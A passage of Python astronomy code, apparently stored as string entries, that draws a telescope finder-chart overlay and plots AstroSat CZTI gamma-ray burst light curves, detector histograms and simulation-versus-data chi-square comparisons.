aplpy.FITSFigure(hdu)\n self.plot.show_grayscale()\n self.plot.set_theme(\"publication\")\n sys.stdout = out\n\n # label for the position angle\n pa_string = \"PA = %.1f\" % self.mode_details.position_angle().to_value(u.deg)\n if 
self.mode_details.automated_position_angle():\n pa_string += \" (auto)\"\n self.draw_label(0.95, -0.05, pa_string, style=\"italic\", weight=\"bold\")\n\n # label for the title\n if self.title:\n self.draw_label(\n 0.5, 1.03, self.title, style=\"italic\", weight=\"bold\", size=\"large\"\n )\n\n # label for the image source\n self.draw_label(\n -0.05,\n -0.05,\n \"%s\" % self.image_generator.source(),\n style=\"italic\",\n weight=\"bold\",\n )\n\n # grid overlay\n self.plot.add_grid()\n self.plot.grid.set_alpha(0.2)\n self.plot.grid.set_color(\"b\")\n\n # indicate the RSS field of view\n self.draw_circle(self.ra, self.dec, 4.0 * u.arcmin, \"g\")\n self.draw_label(\n 0.79,\n 0.79,\n \"RSS\",\n style=\"italic\",\n weight=\"bold\",\n size=\"large\",\n horizontalalignment=\"left\",\n color=(0, 0, 1),\n )\n\n # indicate the Salticam field of view\n self.draw_circle(self.ra, self.dec, 5.0 * u.arcmin, \"g\")\n self.draw_label(\n 0.86,\n 0.86,\n \"SCAM\",\n style=\"italic\",\n weight=\"bold\",\n size=\"large\",\n horizontalalignment=\"left\",\n color=(0, 0, 1),\n )\n\n # labels for north and east direction\n self.draw_label(\n self.ra,\n self.dec + 4.8 * u.arcmin,\n \"N\",\n style=\"italic\",\n weight=\"bold\",\n size=\"large\",\n color=(0, 0.5, 1),\n )\n self.draw_label(\n self.ra + 4.8 * u.arcmin / np.abs(np.cos(self.dec)),\n self.dec,\n \"E\",\n style=\"italic\",\n weight=\"bold\",\n size=\"large\",\n horizontalalignment=\"right\",\n color=(0, 0.5, 1),\n )\n\n # add cross hairs\n self.draw_centered_line(\n 0 * u.deg,\n 8 * u.arcmin,\n self.ra,\n self.dec,\n color=\"g\",\n linewidth=0.5,\n alpha=1.0,\n )\n self.draw_centered_line(\n 90 * u.deg,\n 8 * u.arcmin,\n self.ra,\n self.dec,\n color=\"g\",\n linewidth=0.5,\n alpha=1.0,\n )\n\n # label for the magnitude range and bandpass\n if self.magnitude_range:\n self._show_magnitudes()\n\n # add mode specific content\n if not self.basic_annotations:\n self.mode_details.annotate_finder_chart(self)", "def plot_vis_test(plotfile,pdf_file):\n\t# First some parameters looked up from configfile---------------------------------\n\t\n\tgrbdir = runconf['l2file'][0:10]\n\tpre_tstart = runconf['bkg1start']\n\tpre_tend = runconf['bkg1end']\n\ttrigtime = runconf['trigtime']\n\tgrb_tstart = runconf['transtart']\n\tgrb_tend = runconf['tranend']\n\tpost_tstart = runconf['bkg2start']\n\tpost_tend = runconf['bkg2end']\n\tt_src = grb_tend - grb_tstart \n\tt_tot = (pre_tend-pre_tstart)+(post_tend-post_tstart)\n\tra_tran = runconf['ra']\n\tdec_tran = runconf['dec']\n\tlc_bin = runconf['lc_bin']\n\talpha = runconf['alpha']\n\tbeta = runconf['beta']\n\tE0 = runconf['E0']\n\tA = runconf['A']\n\tsim_scale = t_src\n\tpixbin = int(runconf['pixsize'])\n\tcomp_bin = int(runconf['comp_bin'])\n\ttyp = runconf['typ']\n\n\t# Calling txy to calculate thetax thetay and the coordinates----------------------\n\t\n\tthetax,thetay,x,y,z,t = txy(runconf['mkffile'], trigtime, ra_tran, dec_tran)\n\t\n\t# Plot the 3d visualisation for the position of the transient---------------------\n\tplt.figure()\n\tfig = visualize_3d(grbdir,x,y,z, t, thetax, thetay, grbdir)\t\n\tpdf_file.savefig(fig)\n\t\n\t# Plotting the lightcurves for the four quadrants---------------------------------\n\tfig = plt.figure()\n\tclean_file = fits.open(runconf['infile'])\n\tplt.title('Light curves for '+grbdir + \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n\t\n\tquad0 = clean_file[1].data\n\tdata0,bin_edge = np.histogram(quad0['time'], 
bins=np.arange(quad0['time'][0],quad0['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data0,label='Quad 0',lw=0.7)\n quad1 = clean_file[2].data\n\tdata1,bin_edge = np.histogram(quad1['time'], bins=np.arange(quad1['time'][0],quad1['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data1,label='Quad 1',lw=0.7) \n\tquad2 = clean_file[3].data\n\tdata2,bin_edge = np.histogram(quad2['time'], bins=np.arange(quad2['time'][0],quad2['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data2,label='Quad 2',lw=0.7)\n quad3 = clean_file[4].data\n data3,bin_edge = np.histogram(quad3['time'], bins=np.arange(quad3['time'][0],quad3['time'][-1],lc_bin))\n plt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data3,label='Quad 3',lw=0.7)\n\tplt.axvspan(grb_tstart,grb_tend,color='blue',alpha=0.1,label='GRB')\n\tplt.axvspan(pre_tstart,pre_tend,color='orange',alpha=0.2)\n\tplt.axvspan(post_tstart,post_tend,color='orange',alpha=0.2,label='Background')\n\tplt.legend(prop={'size':6})\n\tplt.xlim(pre_tstart-100,post_tend+100)\n\tpdf_file.savefig(fig)\n\t\n\t# Calling the sim_dph--------------------------------------------------------------\n\t\n\tgrb_flat,bkgd_flat,grb_dph,bkgd_dph,t_src,t_total = data_bkgd_image(grbdir,pre_tstart,pre_tend,grb_tstart,grb_tend,post_tstart,post_tend)\n\n\tsim_flat,sim_dph,badpix_mask,sim_err_dph = simulated_dph(grbdir,typ,t_src,alpha,beta,E0,A)\n\n\tsrc_dph = grb_dph-bkgd_dph*t_src/t_tot\n\n print \"Total counts in simulated dph: \",(sim_dph).sum()\n print \"Total counts after badpix mask is applied: \",(sim_dph*badpix_mask).sum()\n\tprint \"Excess counts in badpix masked src dph: \",(src_dph*badpix_mask).sum()\n \n\t# Plotting the DPHs before badpix correction---------------------------------------\n\t\n\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\tplt.suptitle('DPHs before badpix correction for '+grbdir + \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n \t# Sim\n\tim = ax3.imshow(sim_dph,interpolation='none')\n\tax3.set_title('Sim DPH',fontsize=8)\n\tax3.set_xlim(-1,128 - 0.5)\n\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax3.spines['left'].set_position(('data',-0.5))\n\tax3.set_yticklabels([])\n\tax3.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\t\n\t # Source \n\tim = ax4.imshow(src_dph,interpolation='none',vmin=0)\n\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\tax4.set_xlim(-1,128 -0.5)\n\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax4.spines['left'].set_position(('data',-0.5))\n\tax4.set_yticklabels([])\n\tax4.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\n \t# Source + Background\n\tim = ax1.imshow(grb_dph,interpolation='none')\n\tax1.set_title('Src + Bkg DPH',fontsize=8)\n\tax1.set_xlim(-1,128 -0.5)\n\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax1.spines['left'].set_position(('data',-0.5))\n\tax1.set_yticklabels([])\n\tax1.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\n \t# Background\n\tim = ax2.imshow(bkgd_dph*t_src/t_total,interpolation='none')\n\tax2.set_title('Bkg DPH',fontsize=8)\n\tax2.set_xlim(-1,128 -0.5)\n\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax2.spines['left'].set_position(('data',-0.5))\n\tax2.set_yticklabels([])\n\tax2.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\tf.set_size_inches([6.5,6.5])\n\tpdf_file.savefig(f) # saves 
the current figure into a pdf_file page\n\t\n\t# Plotting the Badpix mask---------------------------------------------\n\n\tfig = plt.figure()\n\tax = plt.subplot(111)\n\tplt.title('Badpix Mask for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n\tim = ax.imshow(badpix_mask,interpolation='none')\n\tax.set_xlim(-9,128 -0.5)\n\tax.axvline(x=-5.,ymin=0,ymax=64,linewidth=5,color='k')\n\tax.spines['left'].set_position(('data',-0.5))\n\tax.xaxis.set_ticks(np.arange(0,128,16))\n\tax.yaxis.set_ticks(np.arange(0,128,16))\n\tfig.colorbar(im,ax=ax,fraction=0.046, pad=0.04)\n\t\n\tpdf_file.savefig(fig) # saves the current figure into a pdf_file page\n\n\t# Plotting badpix masked graphs--------------------------------------------\n\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\tplt.suptitle('DPHs after badpix correction for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n \t# Sim\n\tim = ax3.imshow(sim_dph*badpix_mask,interpolation='none')\n\tax3.set_title('Sim DPH',fontsize=8)\n\tax3.set_xlim(-1,128 -0.5)\n\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax3.spines['left'].set_position(('data',-0.5))\n\tax3.set_yticklabels([])\n\tax3.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\n\t # Source \n\tim = ax4.imshow(src_dph*badpix_mask,interpolation='none',vmin=0)\n\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\tax4.set_xlim(-1,128 -0.5)\n\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax4.spines['left'].set_position(('data',-0.5))\n\tax4.set_yticklabels([])\n\tax4.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\n\t # Source + Background\n\tim = ax1.imshow(grb_dph*badpix_mask,interpolation='none')\n\tax1.set_title('Src + Bkg DPH',fontsize=8)\n\tax1.set_xlim(-1,128 -0.5)\n\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax1.spines['left'].set_position(('data',-0.5))\n\tax1.set_yticklabels([])\n\tax1.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\t\n\t # Background\n\tim = ax2.imshow(bkgd_dph*badpix_mask*t_src/t_total,interpolation='none')\n\tax2.set_title('Bkg DPH',fontsize=8)\n\tax2.set_xlim(-1,128 -0.5)\n\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax2.spines['left'].set_position(('data',-0.5))\n\tax2.set_yticklabels([])\n\tax2.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\tf.set_size_inches([6.5,6.5])\n\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\n\t# Plotting badpix masked graphs (Binned) ----------------------------------------------------\n\tfor p in [4,8,16]:\n\t\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\t\tplt.suptitle('DPHs after badpix correction for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay)+ \"pixsize=\"+str(p))\n\t\t # Sim\n\t\tim = ax3.imshow(resample(sim_dph*badpix_mask,p),interpolation='none')\n\t\tax3.set_title('Sim DPH',fontsize=8)\n\t\tax3.set_xlim(-1,128/p -0.5)\n\t\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax3.spines['left'].set_position(('data',-0.5))\n\t\tax3.set_yticklabels([])\n\t\tax3.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n\t\tax3.set_xticklabels(np.arange(0,128,16))\n\t\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Source \n\t\tim = 
ax4.imshow(resample(src_dph*badpix_mask,p),interpolation='none',vmin=0)\n\t\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\t\tax4.set_xlim(-1,128/p -0.5)\n\t\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax4.spines['left'].set_position(('data',-0.5))\n\t\tax4.set_yticklabels([])\n ax4.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax4.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Source + Background\n\t\tim = ax1.imshow(resample(grb_dph*badpix_mask,p),interpolation='none')\n\t\tax1.set_title('Src + Bkg DPH',fontsize=10)\n\t\tax1.set_xlim(-1,128/p -0.5)\n\t\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax1.spines['left'].set_position(('data',-0.5))\n\t\tax1.set_yticklabels([])\n ax1.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax1.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Background\n\t\tim = ax2.imshow(resample(bkgd_dph*badpix_mask*t_src/t_total,p),interpolation='none')\n\t\tax2.set_title('Bkg DPH',fontsize=8)\n\t\tax2.set_xlim(-1,128/p -0.5)\n\t\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax2.spines['left'].set_position(('data',-0.5))\n\t\tax2.set_yticklabels([])\n ax2.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax2.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\t\tf.set_size_inches([6.5,6.5])\n\t\t\n\t\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\n\n\t# Plotting the comparison graphs with equal bins ---------------------------------------\n\tprint \"No. of pixels with zero counts in sim_dph: \",sim_dph[sim_dph==0].size\n\tprint \"No. of pixels with zero counts in grb_dph(no bkg subtration): \",grb_dph[grb_dph==0].size\n\t\n\t# Generating the array for module number ------------------------------------------------\n\tA = ['A'+str(i) for i in range(16)]\n\tB = np.flip(['B'+str(i) for i in range(16)],0)\n\tC = np.flip(['C'+str(i) for i in range(16)],0)\n\tD = ['D'+str(i) for i in range(16)]\n\tquad_a = np.reshape(A,(4,4))\n\tquad_b = np.reshape(B,(4,4))\n\tquad_c = np.reshape(C,(4,4))\n\tquad_d = np.reshape(D,(4,4))\n\tMod_arr = np.ndarray((8,8),dtype='|S3')\n\tMod_arr[:4,:4] = quad_a\n\tMod_arr[:4,4:] = quad_b\n\tMod_arr[4:,4:] = quad_c\n\tMod_arr[4:,:4] = quad_d\n\tMod_names = Mod_arr.flatten()\n\t#print \"Module name array : \",Mod_names\n\t#-----------------------------------------------------------------------------------------\n\t\t\n\tsim_dph = sim_dph*badpix_mask\n\tsim_err_dph = sim_err_dph*badpix_mask\n grb_dph = grb_dph*badpix_mask\n bkgd_dph = bkgd_dph*badpix_mask\n\tgrb_err_dph = np.sqrt(grb_dph)*badpix_mask\n\tbkgd_err_dph = np.sqrt(bkgd_dph)*badpix_mask\n\n\tsim_bin = resample(sim_dph,pixbin)\n\tsim_err_bin = np.sqrt(resample(sim_err_dph**2,pixbin))\t\n\tgrb_bin = resample(grb_dph,pixbin)\n\tbkgd_bin = resample(bkgd_dph,pixbin)\n\tgrb_err_bin = np.sqrt(resample(grb_err_dph,pixbin))\t\n\tbkgd_err_bin = np.sqrt(resample(bkgd_err_dph,pixbin))\t\n\n\tsim_flat_bin = sim_bin.flatten()\n\tsim_err_flat_bin = sim_err_bin.flatten()\n\tgrb_flat_bin = grb_bin.flatten()\n\tbkgd_flat_bin = bkgd_bin.flatten()\n\tgrb_err_flat_bin = grb_err_bin.flatten()\n\tbkgd_err_flat_bin = bkgd_err_bin.flatten()\n\t\n\n\t # Defining model background and data\n\tmodel = sim_flat_bin\n\tmodel_copy = np.copy(model)\n\tbkgd = bkgd_flat_bin*t_src/t_tot\n\tsrc = grb_flat_bin\n\t\n\tdata = src - bkgd\n\tdata_copy = np.copy(data)\n\t\n\terr_src = 
grb_err_flat_bin\n\terr_bkgd = bkgd_err_flat_bin\n\terr_model = sim_err_flat_bin\n\terr_model_copy = np.copy(err_model)\n\terr_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\terr_data_copy = np.copy(err_data)\n\t\n\tratio = data/model\n\terr_ratio = ratio*np.sqrt(((err_data/data)**2) + ((err_model/model)**2))\n\t\n\tchi_sq = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n\t\n\t # PLotting the comparison plots\n\tf,(ax1,ax2) = plt.subplots(2,gridspec_kw={'height_ratios':[2,1]},sharex='row')\n\t\n\tax1.set_title(\"Comparison between simulated and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f}\".format(tx=thetax,ty=thetay,c=chi_sq))\n\tax1.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n\tax1.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation\",elinewidth=0.5)\n\tax1.legend()\n ax1.xaxis.set_ticks(np.arange(0,len(data)))\n\tax1.set_ylabel('Counts')\n\tax1.xaxis.grid(linewidth=0.5,alpha=0.3)\n ax1.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n\n\tax2.errorbar(np.arange(0,(len(ratio))),ratio,yerr=err_ratio,fmt='.',markersize=2,label=\"Ratio = Data/Model\",elinewidth=0.5)\n\tax2.xaxis.set_ticks(np.arange(0,len(data)))\n ax2.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n ax2.yaxis.set_ticks(np.arange(int(min(ratio-err_ratio)-1),int(max(ratio+err_ratio)+2),1))\n\tax2.tick_params(labelsize=5)\n\tax2.axhline(y=1,linewidth=0.5,color='k')\n\tax2.legend()\n\tax2.set_xlabel('CZT Modules')\n\tax2.set_ylabel('Ratio of counts')\n\tax2.xaxis.grid(linewidth=0.5,alpha=0.3)\n\tplt.tight_layout(h_pad=0.0)\n\tf.set_size_inches([6.5,10])\n\tpdf_file.savefig(f,orientation='portrait') # saves the current figure into a pdf_file page\n\n\t# Plotting comparison graphs with random binning------------------------------\n\t\n sim_flat = sim_dph.flatten()\n\tsim_err_flat = sim_err_dph.flatten()\n grb_flat = grb_dph.flatten()\n bkgd_flat = bkgd_dph.flatten()\n\tsrc_flat = src_dph.flatten()\n\t\n\torder = np.random.permutation(np.arange(0,len(sim_flat)))\n\t\n sim_flat = sim_flat[order]\n\tsim_err_flat = sim_err_flat[order]\n\tgrb_flat = grb_flat[order]\n\tbkgd_flat = bkgd_flat[order]\n\tsrc_flat = src_flat[order]\n\t\n\tprint \"No. of pixels with zero counts in sim_flat: \",sim_flat[sim_flat==0].size\n\tprint \"No. 
of pixels with zero counts in src_flat: \",src_flat[src_flat==0].size\n\t\n\tbins = np.array(np.sort(np.random.uniform(0,1,comp_bin)*len(sim_flat)),dtype=np.int64)\n\tx = np.zeros(len(bins)+2,dtype=np.int64)\n\tx[0] = 0\n\tx[-1] = len(sim_flat)\n\tx[1:-1] = bins\n\t\n\t#print \"The bin edges: \",x # ---------------------------------------------------------------\n\t\n\tsim_flat_bin = np.array([sim_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tsim_err_flat_bin = np.sqrt(np.array([(sim_err_flat[x[i]:x[i+1]]**2).sum() for i in range(comp_bin+1)]))\n\tgrb_flat_bin = np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tgrb_err_flat_bin = np.sqrt(np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tbkgd_flat_bin = np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tbkgd_err_flat_bin = np.sqrt(np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tsrc_flat_bin = np.array([src_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\t\n\tprint \"Total sim_flat_bin : \",sim_flat_bin.sum() #-----------------------------------------\n\t#print \" Max(cumsum) : \",max(np.cumsum(sim_flat)) #-----------------------------------------\n\n # Defining model background and data\n model = sim_flat_bin #avg_flat_bin\n bkgd = bkgd_flat_bin*t_src/t_tot\n src = grb_flat_bin\n\t\n data = src - bkgd\n\n err_src = np.sqrt(src)\n err_bkgd = np.sqrt(bkgd_flat_bin)\n err_model = sim_err_flat_bin\n err_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tchi_sq_new = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n # PLotting the comparison plots\n fig = plt.figure()\n plt.title(\"Comparison between simulated and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq_new))\n plt.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n plt.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation\",elinewidth=0.5)\n plt.ylabel('Counts')\n\tplt.xlabel('Random Bins')\n\tplt.xticks(np.arange(0,(len(data)),1))\n\tplt.legend()\n pdf_file.savefig(fig) #saves the current figure into a pdf_file page\n\n\t# Plotting observed vs predicted counts------------------------------------------------------\n\n\tfig = plt.figure()\n\tplt.title(grbdir + r\" : Observed vs Predicted counts with $\\chi^2$={cs:0.1f}\".format(cs=chi_sq))\n\tplt.errorbar(model_copy,data_copy,xerr=err_model_copy,yerr=err_data_copy,fmt='g.',markersize=2,elinewidth=0.5)\n\tfor i in range(len(model_copy)):\n\t\tplt.text(model_copy[i],data_copy[i],Mod_names[i],fontsize=5)\n\tplt.plot(np.arange(-1000,1000),np.arange(-1000,1000),'k',linewidth=0.5)\n\tplt.xlim(min(model_copy)-5,max(model_copy)+5)\n\tplt.ylim(min(data_copy)-5,max(data_copy)+5)\n\tplt.xlabel('Predicted Counts')\n\tplt.ylabel('Observed Counts')\n\tplt.legend()\n\tplt.grid()\n\tpdf_file.savefig(fig)\n\n\t# Scaling the model using curve fit =============================================================== \n\t\n\tparam,pcov = curve_fit(fit_line_int,model_copy,data_copy)\n\tscaling = param[0]\n\tintercept = param[1]\n\t\n\t# Plotting the scaled plots ===================================================================\n\t# Plotting the comparison graphs with equal bins ---------------------------------------\n\n\tsim_dph = sim_dph*badpix_mask\n\tsim_err_dph = sim_err_dph*badpix_mask\n grb_dph = grb_dph*badpix_mask\n bkgd_dph = 
bkgd_dph*badpix_mask\n\tgrb_err_dph = np.sqrt(grb_dph)*badpix_mask\n\tbkgd_err_dph = np.sqrt(bkgd_dph)*badpix_mask\n\n\tsim_bin = resample(sim_dph,pixbin)\n\tsim_err_bin = np.sqrt(resample(sim_err_dph**2,pixbin))\t\n\tgrb_bin = resample(grb_dph,pixbin)\n\tbkgd_bin = resample(bkgd_dph,pixbin)\n\tgrb_err_bin = np.sqrt(resample(grb_err_dph,pixbin))\t\n\tbkgd_err_bin = np.sqrt(resample(bkgd_err_dph,pixbin))\t\n\n\tsim_flat_bin = sim_bin.flatten()\n\tsim_err_flat_bin = sim_err_bin.flatten()\n\tgrb_flat_bin = grb_bin.flatten()\n\tbkgd_flat_bin = bkgd_bin.flatten()\n\tgrb_err_flat_bin = grb_err_bin.flatten()\n\tbkgd_err_flat_bin = bkgd_err_bin.flatten()\n\t\n\n\t # Defining model background and data\n\t#model = sim_flat_bin*scaling\n\tmodel = sim_flat_bin*scaling + intercept\n\tbkgd = bkgd_flat_bin*t_src/t_tot\n\tsrc = grb_flat_bin\n\t\n\tdata = src - bkgd\n\t\n\terr_src = grb_err_flat_bin\n\terr_bkgd = bkgd_err_flat_bin\n\t#err_model = sim_err_flat_bin*scaling\n\terr_model = sim_err_flat_bin*scaling\n\terr_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tratio = data/model\n\terr_ratio = ratio*np.sqrt(((err_data/data)**2) + ((err_model/model)**2))\n\t\n\tchi_sq = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n\t\n\t # PLotting the comparison plots\n\tf,(ax1,ax2) = plt.subplots(2,gridspec_kw={'height_ratios':[2,1]},sharex='row')\n\t\n\tax1.set_title(\"Comparison between simulated (scaled) and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq))\n\tax1.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n\tax1.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation (scaling = {s:0.2f},offset = {o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n\tax1.legend()\n ax1.xaxis.set_ticks(np.arange(0,len(data)))\n\tax1.set_ylabel('Counts')\n\tax1.xaxis.grid(linewidth=0.5,alpha=0.3)\n ax1.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n\t\n\tax2.errorbar(np.arange(0,(len(ratio))),ratio,yerr=err_ratio,fmt='.',markersize=2,label=\"Ratio = Data/Model(scaling = {s:0.2f}, offset={o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n\tax2.xaxis.set_ticks(np.arange(0,len(data)))\n ax2.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n ax2.yaxis.set_ticks(np.arange(int(min(ratio-err_ratio)-1),int(max(ratio+err_ratio)+2),1))\n\tax2.tick_params(labelsize=5)\n\tax2.axhline(y=1,linewidth=0.5,color='k')\n\tax2.legend()\n\tax2.set_xlabel('CZT Modules')\n\tax2.set_ylabel('Ratio of counts')\n\tax2.xaxis.grid(linewidth=0.5,alpha=0.3)\n\tplt.tight_layout(h_pad=0.0)\n\tf.set_size_inches([6.5,10])\n\tpdf_file.savefig(f,orientation='portrait') # saves the current figure into a pdf_file page\n\n\t# Plotting comparison graphs with random binning------------------------------\n\t\n sim_flat = sim_dph.flatten()\n\tsim_err_flat = sim_err_dph.flatten()\n grb_flat = grb_dph.flatten()\n bkgd_flat = bkgd_dph.flatten()\n\tsrc_flat = src_dph.flatten()\n\t\n\torder = np.random.permutation(np.arange(0,len(sim_flat)))\n\t\n sim_flat = sim_flat[order]\n\tsim_err_flat = sim_err_flat[order]\n\tgrb_flat = grb_flat[order]\n\tbkgd_flat = bkgd_flat[order]\n\tsrc_flat = src_flat[order]\n\t\n\tbins = np.array(np.sort(np.random.uniform(0,1,comp_bin)*len(sim_flat)),dtype=np.int64)\n\tx = np.zeros(len(bins)+2,dtype=np.int64)\n\tx[0] = 0\n\tx[-1] = len(sim_flat)\n\tx[1:-1] = bins\n\t\n\tsim_flat_bin = 
np.array([sim_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tsim_err_flat_bin = np.sqrt(np.array([(sim_err_flat[x[i]:x[i+1]]**2).sum() for i in range(comp_bin+1)]))\n\tgrb_flat_bin = np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tgrb_err_flat_bin = np.sqrt(np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tbkgd_flat_bin = np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tbkgd_err_flat_bin = np.sqrt(np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tsrc_flat_bin = np.array([src_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\t\n # Defining model background and data\n #model = sim_flat_bin*scaling\n\tmodel = sim_flat_bin*scaling + intercept\n bkgd = bkgd_flat_bin*t_src/t_tot\n src = grb_flat_bin\n\t\n data = src - bkgd\n\n err_src = np.sqrt(src)\n err_bkgd = np.sqrt(bkgd_flat_bin)\n #err_model = sim_err_flat_bin*scaling\n\terr_model = sim_err_flat_bin*scaling\n err_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tchi_sq_new = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n # PLotting the comparison plots\n fig = plt.figure()\n plt.title(\"Comparison between simulated(scaled) and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq_new))\n plt.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n plt.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation (scaling = {s:0.2f}, offset = {o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n plt.ylabel('Counts')\n\tplt.xlabel('Random 